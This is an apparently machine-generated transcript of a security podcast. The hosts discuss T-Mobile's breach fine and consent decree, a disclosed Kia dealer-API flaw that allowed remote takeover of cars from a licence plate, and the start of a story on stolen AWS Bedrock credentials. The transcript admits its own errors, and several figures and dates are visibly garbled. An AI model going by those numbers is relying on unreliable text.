Episode Transcript
Transcript is AI generated, and definitely has errors, although it's better at accurately getting our names, so that's good.
[00:00:00]
Matthew: Welcome to the Security Serengeti. We're your hosts, David Schwendiger and Matthew Keener. Stop what you're doing, subscribe to our podcast, leave us a lovely five star review, and follow us at SerengetiSec on Twitter.
David: We're here to talk about cybersecurity technology news headlines and hopefully provide some insight analysis and practical application you can take back into the office to help protect your organization.
Matthew: Views and opinions expressed in this podcast are ours and ours alone and do not reflect the views or opinions of our employers.
David: Yep. T Mobile is lucky. They're about to get their, their free audit. They've almost filled their Wells Fargo regulatory action punch card.
Matthew: Yay! How exciting for them.
David: I'm sure they're happy about it.
Matthew: as a side note, I just logged into our Twitter account and somebody followed us.
David: No,
Matthew: Yeah, it's interesting.
David: it's [00:01:00] probably a bot.
Matthew: That's a good question. If you're listening and I'm talking about you, I apologize.
David: No, he doesn't.
Matthew: Maybe we should actually post something there. I was actually thinking as like, every time we say that, I think to myself, like, maybe we should just delete that. We don't actually really use the Twitter account. So I don't
David: Well, you're supposed to be posting that show got released and all that stuff. You know, the typical Yeah, but
Matthew: the last one I posted was episode one 10. So I'm only 40 behind.
David: was more of a rant with a bunch of slurs in it. So I don't think that one counts.
Matthew: Oh no, here I posted something about episode 127. Oh, the problem was I didn't, haven't changed the pinned post. I've been posting other stuff, but not not actually, ah, whatever. I don't know. I'm actually seriously considering just getting rid of all of my social media. I've already gotten rid of most of it.
Like I don't have a personal Instagram account. I do have a work Twitter account that I use to follow information security folks. And I don't really use any of that for any personal stuff.
David: Hmm.
Matthew: The [00:02:00] only one I've got right now, really. That I use at all is Facebook and I barely use that. And I'm seriously thinking I, the only reason I keep that one around is because it's got a bunch of people from high school and college, but honestly, I never talked to them.
I think I might just delete it. I think I might just go social media free.
David: Oh, one of us. Although, I mean, LinkedIn is technically social media, I guess.
Matthew: thinking about deleting that too, actually.
David: well,
Matthew: me any value either.
David: well, I keep it just for job switching.
Matthew: Yeah. And, but yeah, we should go through and like read off our, read off our recruiter. One of, one of these episodes should be like reading off and critiquing recruiter things. I don't know how entertaining that would be for anybody else, but I think that'd be entertaining for me.
David: to sucker people into hiring you. Ensure your, your record, your, your voicemail recording to
Matthew: Just making fun of them when they try to reach out to you.
David: website or the LinkedIn.
Com website and check out the link. Bye.
Matthew: Oh yeah. Yeah. Yeah. [00:03:00] Yeah. So, yeah, I
David: All right,
Matthew: All right. Yeah, I guess we can talk about
David: well, I suppose we could talk about what we're
Matthew: All right, all right, all right. First, first article we have for today is from CrankySec. It's actually not from CrankySec. That was just the first version of it that I saw. It's about the T Mobile recent fine that they have to pay, but I saw the CrankySec version first because I follow CrankySec and they called it the cost of doing business.
And we know this is cranky sec. They have a negative take on everything, but you know, they're frequently right. They just do it in a very negative style. So T Mobile has been fined three 31. 5 million dollars for seven breaches over a five year period. Half of it is a direct fine. They have to pay no matter what half will be forgiven if they spend it on improving their security.
While researching this, because I was thinking to myself, I was like, man, this is not very much money. And I was looking into like trying to find like other fines for comparison and stuff like that. And I found an article from six weeks ago where they reached an agreement with a different government group, the committee on foreign investment in the U S to pay a 60 [00:04:00] million fine for failure to quote prevent unauthorized access to sensitive data and report those incidents in a timely manner in 2020 and 2021 so since this is the committee on foreign investment, this is looking at slightly different incidents, but still kind of data related items.
And then finally in 2022, T Mobile had to pay 400 million in response to one of those breaches in 2021. So this is, it seems like this is a real problem for them.
David: It's a, it's what you might call a pattern.
Matthew: this is a, you made the joke about Wells Fargo, but this is very similar to how Wells Fargo keeps getting knocked for a deceptive banking practices and signing people up for extra accounts they didn't ask for.
David: Yeah, what, what the average person calls criminality
Matthew: So relevant for the discussion, the U S government said the following. Quote, when organizations that have data on individuals fail to act as responsible stewards for this data, they externalize the costs onto everyday Americans, end quotes. And did, did I not just say last week, or I guess two weeks ago that companies treat these breaches [00:05:00] as externalities?
They've had to face almost no consequences for these types of breaches. It looks like the government has decided to start laying. You know, a small hammer down. This is like a, this is like a doctor hitting your knee with a little rubber hammer.
David: until it becomes one of those giant rubber mallets.
Matthew: I mean, eventually, ideally they would start increasing these fines. So they actually matter, but I don't know.
David: Yeah, I mean congressman only cost 10, 000 So why are you gonna do that?
Matthew: Yeah, we are. It's
David: But I mean they're gonna, they're gonna continue to treat these like externalities because that's kind of what they are. You know, until we come to an understanding about data ownership this is still going to be a problem because if this data, you know, the data that relates to customers, if that belongs to the company, then any harm to a customer that comes out of the loss of the control of that data is by definition an externality.
But if we decide that this kind of data is actually belongs to the people who it's collected on, then the company would need a real contract, not just a [00:06:00] EULA which would hold them account. You could have fees built into it for any kind of data loss or misuse. And if they're holding data for someone that they don't have a contract with, then they're thieves, you know, and then there will be criminals as well as civil punishments for it.
Matthew: It's interesting. So you're proposing that when they take our data, they have to sign a contract with us individually that says what they can do with the data. And then they have to pay us for their use of that data.
David: Right. If they decide to collect it, then they have to gain your consent to collect it and maintain it. So that would be a contractual obligation because what they're collecting doesn't belong to them. Belongs to you. So that would force them into a contract to protect it. And then that contract could state what could be done with that data, whether they share it, how they use it, et cetera, et cetera.
And this is kind of, it's almost the, the, the principle it's. It's, it's kind of what the principle is behind the GDPR, even though they don't come out and say that that person owns their data with the right to forget the, the ability to [00:07:00] correct it, et cetera. But I think if we need to really come down, settle, settle on it and say, that data belongs to you and you are leasing it to the company to use it.
That we need to make that a formal thing because we're really beating around the bush here by charging these companies and finding these companies when they lose this data, when it impacts people as an externality. we're trying to say that the company owns it. If they lose it, then somebody, then they have to pay somebody else.
I mean, if I lose my, you know, my pocket knife. You know, it's only impacting me. It doesn't impact anybody else because it's mine. But you know, when they lose this data, they're saying, well, you hurt someone else now, even though that's your data, you own it, just it's, it's like I said, that's the definition of externality.
Matthew: It's interesting. Yeah, I would. I mean, I know that the way that companies work is they would come up with like, Oh, you know, here's this contract that everyone has to [00:08:00] sign and they'll You know, I'll come together and use a similar contract that gives us almost no power, but at least we would have the option of being like, all right, well, then I'm not using you like, it doesn't matter who you use these days.
They all sell your data almost
David: Right.
Matthew: so you would have an actual choice. Then, like, I will use this vendor who will do what at least is, you know, reasonably in line with my beliefs.
David: Yeah. There was, I think I had mentioned this on a previous podcast and unfortunately I can't find the reference now. But there was an organization that was attempting to create like a I don't know what a good term for it would be. So I'll use it, just call it a data vault where you would keep the you keep a, a a list of metadata about yourself in there.
And then you could sell or at least access to that data to the different companies. And then they, they couldn't copy the data on it, but they could access the vault with that, with this contract because it's your vault and you're able to, and because you're the owner, you could sell access to it.[00:09:00]
Matthew: Yeah, that's
David: way, these company, no, no company would, would maintain any of this data.
They would simply access these vaults instead. Based on the contractual relationship to the vault owner.
Matthew: Yeah. And
David: That was an interesting idea.
Matthew: Potentially limit the time to grant them access for like a week or a day or something. And then again, although they could copy it if that could be in the, the, the thing is you can't copy it. You can only
David: Access, right? Yeah. I mean, the possibilities are almost limitless.
Matthew: Yeah. Interesting. All right. The government is attempting to force them through the Forgiven, Fine, and a Consent Degree to do the following items. Summarize. This is very small. There's actually a lot more detail in the Consent Degree. They have the Summarize List, and then they've got like 15 pages of more detail, which we will hit on a couple of those things, but we're not going to go over 15 pages.
They have to have a CISO who reports to the board.
David: Imagine that.
Matthew: And according to [00:10:00] CrankySec as of October 1st, they did not have a CISO listed. Implement zero trust and segment the network. That one seems a little, the segment one, like were they not segmenting before? But the zero trust one seems a little excessive. Zero trust is tough.
David: Yeah. Well, I think they're also supposed to get a unicorn for the patio,
Matthew: ooh, the the regulator wants a unicorn and a shrubbery. Minimize and delete data. I have a critical asset inventory, which is hilarious. Cause that's one of those things that forever people have been like, you need to have a critical asset inventory. And it seems like it's so simple, but
David: because it sounds simple because people are used to physical things, like you have an inventory in a warehouse, easy, right?
Matthew: Yeah.
David: In the digital space is a little bit more complex than that.
Matthew: unfortunately,
David: Especially when you don't start keeping an inventory when you buy things, because all companies start off as startups, which case it's more like a drug dealer with a, with a bunch of stuff stacked in a shoe closet. You know, like, [00:11:00] yeah, we don't really have an inventory about what's in there. And then later on they decide, oh, well we need to inventory it. So they started digging stuff out of the shoe closet and then they find out there's stuff in the basement and there's stuff in the attic and it's all over the place.
Matthew: yeah and then have a third party assessment of their security capabilities. So were they not doing pen tests at all? It's hard, difficult to tell for me from this consent degree if this is just a laundry list of stuff they think you should do or if this is actually things they were not doing before.
Like the CISO one is very easy to tell, like there's not a CISO listed, they do not have a CISO. But what about the rest? Do you think they were doing them and just not doing them well enough or not doing them at all?
David: I know. I mean I, I took it to mean that if they call it out specifically, then they weren't doing it.
Matthew: Yeah, I mean it could be.
David: and I mean, and they don't have a CISO today.
Matthew: Yeah, they don't have a CISO.
David: Cause I was thinking, well, why would they call it these specific things and not other things, because obviously there's a ton of things they could call out as far as what should be in a security [00:12:00] program what they didn't.
So I made the assumption that, well, this means they are, we're not doing these things. Because even if they were doing them and doing them poorly, then they were still doing them. So they couldn't say that they weren't, it's just that they're terrible at it. And I know the government would, would, and is trying to start fining people for being bad at stuff.
Not, not just not doing things, but being, being poor at it.
Matthew: Yeah, I don't know. All right. So discussion points. Cranky SEC points out that this fine is less than what the CEO made last year. The CEO apparently made 90 $36 million last year. So this fine is chump change.
David: Well, I mean, it might have to forego an ivory backscratcher or two.
Matthew: Yeah. Yeah. I was going to point out that they might have been like a business decision where they wanted to, they decided that getting popped and paying the fine was less than the cost of security. But then I saw that they had that 400 million fine two years ago.[00:13:00]
David: Yeah. And, and that that 400 million, that's 5 percent of, of net revenue.
Matthew: Yeah. But that's still gotta be more expensive than the cost of the security program. Right? Like, I don't think they would spend 400 million on security.
David: Yeah. It would seem unlikely,
Matthew: I wonder if there's, yeah.
David: assumed they would never have to pay 400 million, you know, if they assume that, that any fine that gets only 30 million, then they might be too willing to take that risk.
Matthew: Interesting. All right. So obviously this is search labs. This is AI overview. It may not be true, but this one says that on average company spend 5 to 20 percent of their it budget on cybersecurity, which is 3 to 5 percent of their annual total budget. So I'm reading that their it budget is 3 to 5 percent and they're spending 5 to 20 percent of that.
So between 5%, 0. 15 [00:14:00] percent to 1 percent of their total annual budget. So that 400, 000, 000 is about five times,
David: Well, we do know what their budget is. I only know what their income was, which
Matthew: That's what I was doing. I was
David: 8. 3 billion.
Matthew: yeah, but you said that was, you said 400, 000, 000 would be 5 percent of that. And this was saying that many companies spend about 5 percent of their budget on IT. So this 400, 000, 000, if you believe that, would be about what they would spend on IT. And then they'd spend between 5 percent and 20 percent of that on security.
David: I see what you're saying. Right.
Matthew: So like 80 million on security max. So I don't know. So it does seem like the 32 million fine would be less than what they would spend on security. They would pay that fine every year security.
David: You know, and the thing is you think about T Mobile, which is a international telecom.
Matthew: Yeah.
David: Their infrastructure has got to be huge.
Matthew: Yeah.
David: spending that on their, their security, they're underspending probably. I mean, if you, if you had a normal [00:15:00] business, a regular business, a retailer or whatever, that was making 8. 3 billion a year, they do not have the technical infrastructure that a telecom has that they need to defend again, you know, that they need to defend. So they could get away with a lot smaller cyber spend than a telecom. So T Mobile was just a penny pinching.
Matthew: That's about right. So do you think the government should be able to force a private company? I mean, I guess technically with our consent decree, they're not actually forcing they're just trying to force the government. The company doesn't have to obey it.
David: I'm sure they don't.
Matthew: That's really dumb. Yeah, they did say the consent decree does say the implementing these controls will probably cost an order of magnitude above and beyond the fine cost of the fine cost of 16 million there. The government estimates that this will cost at least 160 million.
David: Yeah. So we're going to find you 15 million and then we're going to have you sign a document, which basically commits you to spending another, you know, X number million, 160 million or 150 million on [00:16:00] stuff. And we'll give you a discount on that stuff by allowing you to retain 15 million from the 30 million fine.
Matthew: Well, they'll probably get to also deduct it depending on how they're, yeah, probably some level of tax write off for that too, so.
David: Mm hmm.
Matthew: Good for them.
David: They've got a team of lawyers figuring this out, so I'm sure this is not that terrible for them, probably.
Matthew: So based on the terms and, oh wait, we already talked about this, so nevermind. We talked about come on this. We talked about some of the things. So we talked about some of the things in the consent decree, whether T Mobile had the opposite, like not having a CISO. But I'm curious about the comment about zero trust and segmentation.
Does that mean that their network wasn't segmented? I mean, they're such a large company. Like you just mentioned, I feel like there has to be some level of segmentation in there just for it management sake. In the document, they did mention that apparently at least one attacker was able to guess passwords for a server, then move laterally across multiple network environments and a lab environment.
So
David: Well, they call, they called out segmentation. Or [00:17:00] firewall auditing between production and non production. So I think that may be the only segmentation that they were specifically thinking about when they wrote that was simply separating production and non production versus what we would think about from segmenting different parts of production off from other parts of production.
Matthew: Yeah.
Yeah, could be. It also mentioned MFA, which, again, makes me wonder if they're not using MFA. The consent decree doesn't say everyone needs to, just covered individuals who access covered information.
David: Yeah. And apparently they have to encrypt admin passwords now.
Matthew: Man, that is so harsh. I can't believe that. I can't believe they are making them encrypt admin passwords.
David: You know, my guess is that that was called out because they found a spreadsheet or something that was used by the IT department. That had a list of passwords in it.
Matthew: Absolutely. I've got two years to do it limit consumer [00:18:00] information collected and have a retention schedule. So they were collecting too much and they were keeping it too long. I can't believe it.
David: Never know when you're going to need that information, Matt. So keep it forever.
Matthew: I mean, that's probably what they're doing. I mean, as we've been finding out, there's more and more things that you can monetize. They probably were like, well, let's just keep it and see can do some with it at some point.
David: Yep. I mean, there's no reason to throw out somebody's record just because they don't use you anymore as a, as a telecom. Mm hmm. I
Matthew: Yeah, it really, really depends on, I mean, it's really cheap to keep information, so.
David: mean, dang those cheap hard drive costs. But assuming that everything that was called out in that agreement, T Mobile was not doing, there are a lot more issues at T Mobile than just what the highlighted list. And that list that Matt went over with the CISO and third party reporting the critical asset, Virtually every article had that exact same [00:19:00] list.
I didn't see any article that really dug farther down into any of the details in there, but we're going to go through a couple other things that were called out in the, in the document beyond just that short list there. For one thing, T Mobile must have a written cybersecurity program. So they actually have to write down what their cyber security program is, rather than saying, Ah, we have a vague feeling about
Matthew: it was it was all based on vibes before
David: Another good one. T Mobile must regularly conduct vulnerability scans on externally facing ports on the T Mobile network.
Matthew: people aren't doing that. That's wild.
David: T Mobile must maintain an intrusion prevention system.
Matthew: It's an Avenue IPS.
David: And, and not less than annually review the fine, the tuning of these systems.
Matthew: that one's interesting. I actually have never been at a company that reviews the tuning of an IPS annually.
David: I have and it's no fun.[00:20:00]
Matthew: Yeah, like what does that mean? Like you go over every single rule and like every single exception. Like, I would assume that you could just use the penetration test to kind of validate that it works.
David: No, you do. The way that, that, that they did it was they ran a, what, what they thought was a false positive report annually,
Matthew: All right.
David: and then decided which rules to keep and which ones to let go. I'm not saying that's the way these, I personally, I, I think this annual review is a waste of time. This should be something that's continuous. based on your reports. You know, too many false positives, you fix it. You know, you know, every time you get a false positive your view that, that, that, uh, the false positive ratio for that event, and then decide if you're going to move it into corrective territory or not.
Matthew: Hmm.
David: But anyway another one, another good one is they have to maintain a triage process to prioritize the alerts and respond to them in a [00:21:00] timely manner.
Matthew: Oh no, you have to respond to alerts.
David: And have a triage process. That's terrible.
Matthew: have a triage process. Yeah,
David: Who would do that?
Matthew: like randomly selecting like, hmm.
David: Who that, who knows what the heck they were doing?
Matthew: Oh boy.
David: And, and here, here's the, here's a, here's my favorite. T Mobile shall not misrepresent in its privacy policy statements on its website or its subscriber agreements or other communications or representations made to consumers the extent to which T Mobile reasonably protects the privacy or security of consumers covered information.
Matthew: Oh, so they can't just say like, Oh no, we're doing everything to,
David: In other words, they can't commit fraud.
Matthew: that's wild.
Can't believe it. I'm stunned. So should do you think on the other side of that, we talked about whether the government should be able to do this to a company or not. Do you [00:22:00] think that the company should take a deal where the government waives fines in place of say, in this case, improving security, especially if the overall cost is an order of magnitude above and beyond?
So, I mean, I think that they should safeguard my data, but this type of thing is always a business decision. It's not about how Matt feels about his data.
David: Yeah. Well, the way that I read this actually is, I think they were blackmailing them
Matthew: Hmm.
David: because there's, there's, there's a statement in the, in the agreement, which says in express reliance on the covenants and representations in this consent decree and to avoid further expenditure of public resources, the bureau agrees to terminate the investigations. So in other words, Hey, you agree, or we're going to keep digging until we find something more serious. Yes.
Matthew: Interesting. So this is, this goes back to what you were saying a minute ago about blackmail.
David: You know, I'm going to hold my hand out here. And if money were to fall into it, I may have something else to do this afternoon.
Matthew: [00:23:00] Yeah. All right. Final discussion item for me. Should other companies use this consent decree as a reasonable list of what the government expects and measure themselves up against? Against it in case of a breach, for example, you know, you're doing all of these things and you still got breached. You get to tell the government you're doing the best you could or would they expect more?
David: Well, this is the whole point of frameworks though. Right? And this is one of the things that I think you and I have probably been complaining about since we started this podcast is the arbitrary nature for all these decisions that government makes whenever they do these investigations and, and assess.
Failures and levy fines and all this stuff. It's, it's arbitrary across the board, depending on who, who the regulator is, who the individual auditors are, and which company is being accused of malfeasance versus having something to say, you will do these things and everybody's held to the same standard. So, I don't know. It's just, it's, It's just across the board a bad way to do it, a [00:24:00] bad way to do business. But it's the way the government likes to though, because it gives them that leeway to punish those they want to punish and let off those that they don't.
Matthew: yeah, I, hmm. Yeah, I, I, I like your point about the frameworks, like, Why not just, why not just tell them like meet nest 800 53 or something? Why are they, why are they doing all of this separately? I don't know. It's weird.
David: Well, like I said, I think it's purposeful though, because that does give them the leeway of punishing who they want and to look the other way for those that they don't want to.
Matthew: Yeah, that's fair. All right. So why does this matter? Well, this is opening up a can of worms. If you're breached and the government decides to make an example out of you there's lots of things that they can do to mess with your life.
David: Alrighty, moving on to the next article. Hacking [00:25:00] Ikea, or not Ikea, Kia. Remotely controlling cars with just a license plate. And this comes to us from SamCurry. net. And so the author and some compatriots discovered that there was a way to take advantage of the Kia dealerships API endpoints to allow them using only the license plate to take I guess, electronic ownership of the, of Kia vehicles. Which means that they could find the vehicle, they could get into the vehicle, and they could steal the vehicle.
Matthew: Sounds like fun.
David: Yeah, I mean, anytime you've heard people say you know, I really wish I could steal a Kia. Well, there's an app for that now.
Matthew: This is yeah.
David: Well, if you, if you go to the article that we've got linked here, they've got a video of a dude who wrote a phone app. A smartphone app and was doing all these things via an app on the phone. It's pretty slick. So [00:26:00] what, what the, what the attackers did, or the researchers did, was they discovered that they could register themselves as a Kia dealer, there were no checks to validate that that's who they were. And then they were able to use their access as a dealer to make API calls, would get them access. And the way that they did this was via the VIN on the car. So they could look up the car VIN. Then, or I'm sorry, look up the license plate, which would link to the VIN and then get access to the the car via this, API at the dealer to the, the I think they call it a dealer proxy. So, and apparently there are hope. I, I was thinking that, you know, there must be some formal agreement between Kia and DMVs. So that the VIN and the license plate could be associated with each other, but apparently not, because there's a bunch of companies that you can get VINs from license plates numbers via an API call.
[00:27:00] There, there'll be a link to the, to one of them in the show notes and in their documentation, they, they, or they're frequently asked questions. They say, how, how can we do this? And they say quote, we have agreements with public and private sector data partners. End quote.
Matthew: That's it.
David: That's it. That's how they can do it.
Matthew: Yay, good for them. I guess. We have agreements.
David: And the way this whole thing works is to quote the, the researcher, they could execute internet to vehicle commands, you know, for when you want to drive your car, which is in Iowa, while you were in Arkansas.
Matthew: I, well, I don't think you can actually drive it.
David: No, I'm just saying that if you, your car is a physical thing, you can't use it if you're there, if you're not there, right? So why do you need to access your car over the internet? That's my point. Thank you.
Matthew: that's fair.
David: you could fix this whole thing by not connecting the car to the internet.
Matthew: Yeah. Well, I mean, it's for [00:28:00] lazy people that do not want to go outside in the cold car and they want to start it and get it heated beforehand.
David: Well, they used to just have remote start doohickeys back in the day that was just RFI.
Matthew: Yeah.
David: Now, this is just having GFIs and then making them a reality when they're completely unnecessary and, I think, pose a greater risk than, or, than benefit.
Matthew: Wrong. Yeah. There's there is, there seems to me very little benefit to, especially for some of these, like start and stop the car. All right. You can warm the car up on a cold morning. Awesome. Or cool it down on a hot day. Yeah. And lock and unlock. The. Car remotely, honk the horn remotely geolocate the, I guess geolocating the vehicle might be somewhat useful if you forgot where you parked it, but I don't have that problem, so
David: Yeah, the same thing with honking the horn. You're in the parking lot and you're just like, well, I'll honk my horn and then just go to the sound.
Matthew: So the real answer here, though, is that you can't, if you don't have this connectivity, you, excuse me, you cannot sell a subscription. [00:29:00] To use their app. So my wife has a Toyota and she got the app and the remote start functionality for free and the lock the cars. If you forgot to lock your doors she got that for free for the first year, but now it costs us like 200 bucks a year or something to maintain that.
David: Holy cow.
Matthew: Oh, wait, it's less. It's less. It's only 8 a month or 80 a year, still. But this gives them a way to where they have sold you a physical car, and now they are charging you a subscription on top of that. It's kind of like I don't know if you saw the BMW one, where the, to get access to the heated seats, you had to pay an additional fee each year.
David: Oh, nice.
Matthew: Yeah, no, this is, this is that rent seeking thing that every company is looking for now. It's, it's not enough to sell you something. We have to figure out some way to get you to keep buying that thing, forever and ever. Alright.
David: Right. So not only did, so now your car, your car comes with in app purchases.
Matthew: Oh my God. Can you imagine that? Like pay us 20 right now to get the the, the top two levels of your fan on your air [00:30:00] conditioning. We've noticed it's a hundred degrees outside. Would you like to get cooler faster?
David: Yeah, it goes up to number two. You know, it's, this is, this is funny to me because Philip K. Dick. Envisioned this 40 years ago. I can't remember the name of the short story But it starts off with this guy needing to get out of his apartment and his door refusing to let him out until he paid
Matthew: Microtransactions everywhere. Can you imagine that it costs you a quarter to unlock your door to get into the car and
David: that's
Matthew: and then 2 to get out.
David: It's like he wanted toast that was like costing nickel to get some toast It was it's it's crazy. And so, you know, it's unbelievable that he you know envisioned that long before The smartphones and even really the Internet
Matthew: So, okay. So here's a weird take on that. If those numbers actually matched up to how much it costs to do that thing, I wouldn't mind. So for example, like five cents to create toast. Like, that might make sense in terms of the electricity used and the wear and tear on it. But you know that [00:31:00] these companies are not doing this based on the cost.
They will sell you the thing, and then they will also charge you more. But like, if every time you did something you saw how much it costs, I feel like people would make a lot more economical decisions.
David: Well, it used to be that when you bought the thing, you, you paid for the capability to do what you're talking about, right? When you bought the car, you bought the car with the capability to turn the fan all the way up.
Matthew: Yeah. Well, so what I was thinking of is I'm thinking of is right now. It's sometimes difficult to like, like roads is what I'm thinking of right now. The US is behind quite a bit in terms of maintenance for roads. And a lot of that is not the fault of cars. Apparently damage to roads goes up geometrically based on the weight of the vehicle.
So big trucks construction vehicles and such are doing way, way, way more damage than regular cars are to the road, but they're paying similar amounts, [00:32:00] like, like they're basically, we are subsidizing all of them. And that makes sense. I mean, we pay for it either way. Either we. You know, charge them like a toll that reflects the damage they're doing to the road.
And then they charge us higher prices on their goods, or we pay more in taxes to fix the roads. Like, either way it gets paid for. I was just thinking it'd be nice to kind of see exactly how much everything costs because there's so many costs that we don't really think about. Like every day we live in a house, you know, if you're, if you're, I'm just going to say 3, 000 for your mortgage just because it's easily divided by 30 days.
Like that's 100 a day that it costs you to live in your house. And you know, maybe you pay 90 a month for electricity. That's 3 a day that you're paying for that electricity. Like there's a lot of things that are kind of, it's not externalized. What's the word I'm thinking of where they're kind of hidden or not hidden, but they're set aside in such a way that it's difficult to see kind of day by day.
What it's costing you. There's a word for that, and I cannot think of it. So I was just thinking, like, in [00:33:00] some ways, it'd be nice to see, like, what your actions cost you directly. Like, ding, this just cost me 25. Like, I may not have paid 25 right this second, but it's going to cost me in, you know, bills and stuff like that.
David: Right.
Matthew: When you harass a woman, ding, this is going to cost me 25, 000 in lawyer fees.
David: Well, you must not have been harassed or very much if it's only 25, 000.
Matthew: an email to your boss, ding, this is going to cost you your salary for the next six months. Cause they're going to fire you. Anyways. Anyways. I digress.
David: Yeah, well, I mean, as far as the bigger truck goes, considering there's a gas tax, they generally are less efficient and have to pay more gas and, and do more miles to the gallon or fewer miles to the gallon. Maybe they are paying more because of that inefficiency.
Matthew: I think I think, well, but I dunno, read an article and you know, we all know how truthful articles are and we should rely on them constantly.
David: yeah, and what I'm saying also assumes that they're actually spending [00:34:00] the gas tax on the infrastructure and not ivory back scratchers and plasma TVs.
Matthew: Yeah. That's a big screen TVs. I've gotten so cheap. I mean, it's basically free.
David: Yeah, and you have all that leftover money in September, which you have to spend before next year's budget starts in October. So,
Matthew: you know, it would be amazing as if the leftover money they spent got like automatically rebate rebated to people.
David: but they never have any leftover money because they blow it all in September. I've, I've been government, worked a government contract for a lot of years and every September. Regardless of the organization I was in, government people always came and asked for people to figure out how to spend money in September.
I mean, sometimes millions and millions of dollars. But hey, we are four million dollars under budget, so we have to find out something to spend all this money on. One place I was at, they were so over budget that they decided to buy a personal printer for every worker at, at the location.
Matthew: Personal [00:35:00] printer.
David: 50 personal printer.
And the ink cartridges to recharge those printers cost a hundred dollars. And so they did this, but never got the printers from the warehouse and handed them out. So they just sat in the warehouse till they became into life. Tax dollars are work, people.
Matthew: So, I mean, I agree like this would,
you'd have to make a, you have to change the process such that they didn't lose their money the next year if they didn't spend it. And then, but there's just the money got rebated every year, but either way, it's a pipe dream. So, I guess it doesn't really matter.
David: Yeah. The government doesn't have customers, you know, so they have, they have no need to serve those customers in an efficient manner.
Matthew: that's fair.
David: They their, their subjects have nowhere to go. Unlike businesses who have customers and their customers could go somewhere else.
Matthew: Fair enough. All right. Also, other items if you don't have the car connected to the Internet, then how can the government not track you in them previously talked about. [00:36:00] Car companies are selling your speeding and driving data to insurance companies and it's come out, I think, I don't remember what company we talked about at the time, but it's come out that more companies are doing this.
At least one of them is calling it a quote unquote safe driver program. It was confirmed Hyundai did this between 2018 and 2027 for 1. 7 million vehicles with no disclosure to the owners at all that they sold them their location and speeding data. And we've talked before about how the government is getting around the fourth amendment and other constitutional protections by buying data from third party sources.
So theoretically, the government could, if they haven't already done this, just go out and buy all of our data and just start matching it up with places that known crimes have occurred. And, you know, if you just happen to coincidentally be in the area, well, sad for you, you may be connected by some circumstantial data now.
And we all know that the government is really good about making sure that they've caught the right person.
David: Yeah. Well, you may have also parked your car in near a free speech zone.
Matthew: What's the free speech zone? Oh, the, the protests? Yeah. [00:37:00] Yep. Yep. Yeah, I keep, I would love to go to a protest sometime with especially if it was for something, even if it's something that I don't necessarily agree with, I still think I still kind of want to just go. now that I know that now that I know that they're watching and doing facial recognition on everybody that I'm like, Nope.
Nope, nope, nope. No, because I will end up on more lists. While most of these are more annoying than dangerous, I could see issues with stalkers and exes, where you submit the license plate and geolocate them. Also, I could see that stopping the car in the middle of the interstate might be somewhat dangerous, and I was talking with my wife about this earlier.
Theoretically, you could set it up so you go search for cars near you. Since you have the license plate, you might be able to look up. You know, all license plates and that are registered in an area near you. Find the vans, find one, unlock it, turn it on and steal it.
David: Grand Theft Auto in reality. Where you know, you just steal a car to get to the outside town, then you just abandon it
Matthew: you just
David: and then you see another car later to go somewhere else.
Matthew: [00:38:00] I know that a lot of the modern cars have protections against that. Again, my wife has a, the Toyota with the app. So when you remote start it and then you open the car door and get in, it actually turns off. But I don't know if all, All auto owners have that protection, or if you can use the app to fool it into thinking you have the key or something,
David: can you get it to roll down the window?
Matthew: well, I mean, getting into the car, you can definitely do. The question is whether or not it will drive off without the key. Like, is the app enough or does it require the key?
David: you should do some experiments.
Matthew: I would need to get access to this app to do that. I mean, we could do it
David: I'm saying your wife's car.
Matthew: Yeah. We could do it with the Toyota one.
David: it with the car, with the window down and then climb in and see if you can drive away.
Matthew: Oh, oh, I see what you mean. Oh, interesting. That would, I would look ridiculous.
David: Cause you figure if the car windows, imagine the car's running or you could start the car, you could smash the window, climb in and then drive off maybe.
Matthew: Yeah. Yeah, that's interesting. All right. Yeah, that'd be possible, maybe. So which
David: do some [00:39:00] experimentation, report back.
Matthew: So I did a quick search for cars that are not internet connected, and sometimes you can dodge this by getting the base model of the car, which doesn't have the hardware to connect. According to Reddit, which is of course a top quality source, the component to connect it to the internet is kind of expensive, so they tend to leave it out.
Well, I'll talk about that in a second. Some people say you can
David: Oh, hold on a second. This made me think, you know, your wife's paying for that, that, that subscription to the Toyota app. Does that
Matthew: out. I don't want anybody to know.
David: What does that mean that you're paying the, the, the data feeds for the connection, like a SIM card and connection to the internet as part of that, that's part of that fee is the actual connection to the internet with the SIM card or however the card connects to the, to the internet.
I assume it's got to be a SIM card because it's probably cell, right?
Matthew: Yeah, I think
David: Because that's the only way you're going to have broad scope [00:40:00] coverage. So if they're, if you're not paying for a subscription, then they would have to pay for themselves for that internet connection. And actually, I wonder, they would have to have a SIM card to do this. Maybe you could just find the SIM card on the car and yank it.
Matthew: That's a possibility. That's interesting. Some people online said you can remove the component afterwards through a mechanic and then flash the software in the head unit, whatever that means, and then you no longer have that connectivity, but that sounds like that's pretty involved. Or
David: Yeah, you really got to want it. I would say, you know, you cut the antenna or you put a Faraday cage around the antenna.
Matthew: Well, one of the
David: I thought about that idea before you, you build I was thinking about this if, if, cause if it's all going out through the antenna on the roof of the car, you build a fair, you build a fair day cage, a small fair day cage is just bigger than that antenna.
And you put some really heavy duty magnets on the bottom with some felt and you just put that over top of your antenna to prevent signals from being able to get in and out of the [00:41:00] antenna.
Matthew: Yeah, I could see that.
David: If that's the antenna that does that anyway,
Matthew: yeah, I don't know. The other thing that you mentioned before we started recording was the new law forcing a kill switch in all cars. So if all cars have to have a kill switch that means that starting in 2026 they are going to have to have that component in the car.
David: Right. Well, actually I have to look at the law, but I think the law says the cars have to be manufactured with it. I don't know if it says anything about you're legally obligated to ensure that that connectivity is there for your car. If you buy one.
Matthew: Yeah, I don't know.
David: I mean, I imagine that after this, after, you know, that Keswich has been around for a year or two, you're going to have all sorts of people offering DIY and, you know, mechanic fixes to, to get rid of it. Cause I don't, I don't think I don't think America's going to put up with it. I certainly hope not.
Anyway, I
Matthew: Yeah, I don't know.
David: mean, I'm [00:42:00] never buying a new car, so I'm not really terribly worried about it, but some, some Americans who care me,
Matthew: That's fair. Alright, our final article today, short one. The second one took a lot longer than I thought it was going to. Single cloud compromise can feed an army of AI sexbots from Krebs. Techers have figured out the next big way of monetizing a breach and it's using those LLM resources from AWS to run chatbots.
That chat about things you don't want your name on the bill for a company called permiso, which is in cloud security, put up a canary account for AWS is LLM service bedrock and exposed the creds in GitHub, GitHub, and then they turned on prompt logging to see what the bad guys did. You'll never guess what they did next.
David: it was untoward. It
